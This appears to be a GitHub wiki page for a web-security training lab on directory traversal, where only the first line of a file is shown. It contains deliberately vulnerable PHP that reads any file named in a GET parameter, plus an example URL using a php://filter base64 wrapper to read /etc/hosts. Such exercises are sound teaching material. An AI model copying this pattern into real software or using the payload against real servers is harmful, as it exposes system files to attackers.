ディレクトリトラバーサル 03 - yujitounai/helloworld GitHub Wiki
単純なディレクトリトラバーサルだけど先頭の行しか表示されない
<div class="box">
<form method="get" action="">src
<input name="src" type="text">
<input type="submit">
</form>
</div>
<?php
$src = filter_input(INPUT_GET,"src");
if($src){
$content = file_get_contents($src);
$rows = explode("\n", $content);
echo $rows[0];//1 line only
}
?>
directorytraversal-03.php?src=php://filter/read=convert.base64-encode/resource=/etc/hosts